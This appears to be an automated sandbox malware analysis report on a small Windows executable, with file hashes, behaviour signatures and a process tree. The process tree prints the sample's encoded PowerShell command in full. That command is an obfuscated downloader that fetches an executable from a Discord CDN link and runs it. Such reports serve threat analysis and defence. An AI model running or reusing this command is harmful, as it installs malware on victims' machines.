Analysis

  • max time kernel
    135s
  • max time network
    155s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags

    arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
  • submitted
    01/02/2023, 16:00

General

  • Target

    d7f8019fa6a535bc1b0b7f9fc1f751ae.exe

  • Size

    5KB

  • MD5

    d7f8019fa6a535bc1b0b7f9fc1f751ae

  • SHA1

    f496986f7a40c0a9ef35c950f48522faf7d403d9

  • SHA256

    46c6ffe88a3541f179da56eac0d6649fe5b20b561a43793bb7b5c1b8282ad4df

  • SHA512

    aa76eb6b09fe7fa2b1a2008ca2d1bebb76cb628b786635b21fad0f44a5c895f6089a790e11dd620bb741c6cca223511cd18e971a68a3e3b223b5cfabbd9fea65

  • SSDEEP

    96:cHkI5797fCFVwiTVtowwvk+dw78bC/+PGc7Y3d3ojVrl:WJ976FPVnwvka+8bC/+Pg3ds

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d7f8019fa6a535bc1b0b7f9fc1f751ae.exe
    "C:\Users\Admin\AppData\Local\Temp\d7f8019fa6a535bc1b0b7f9fc1f751ae.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1772
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAaABsACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA5ADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAANgA3ADQANwA5ADEANQAzADYAOAA0ADcAOAA3ADMANgAxAC8AMQAwADYANwA0ADcAOQA0ADEAMwA5ADQANQA1ADMAMgA1ADAANgAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAYQBsAHQAaABTAGUAcgB2AGkAYwBlAC4AZQB4AGUAJwAsACAAPAAjAHIAdwB2ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZABmAHMAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAaQBuAHoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMQAwAC4AZQB4AGUAJwApACkAPAAjAHQAZgBxACMAPgA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHUAaQB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGwAYgAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwAxADAALgBlAHgAZQAnACkAPAAjAHAAawBqACMAPgA="
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1620

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1620-58-0x000007FEF3600000-0x000007FEF4023000-memory.dmp

    Filesize

    10.1MB

  • memory/1620-60-0x0000000002504000-0x0000000002507000-memory.dmp

    Filesize

    12KB

  • memory/1620-59-0x000007FEF2AA0000-0x000007FEF35FD000-memory.dmp

    Filesize

    11.4MB

  • memory/1620-61-0x000000001B7F0000-0x000000001BAEF000-memory.dmp

    Filesize

    3.0MB

  • memory/1620-62-0x000000000250B000-0x000000000252A000-memory.dmp

    Filesize

    124KB

  • memory/1620-63-0x0000000002504000-0x0000000002507000-memory.dmp

    Filesize

    12KB

  • memory/1772-54-0x0000000001050000-0x0000000001058000-memory.dmp

    Filesize

    32KB

  • memory/1772-55-0x000007FEFB941000-0x000007FEFB943000-memory.dmp

    Filesize

    8KB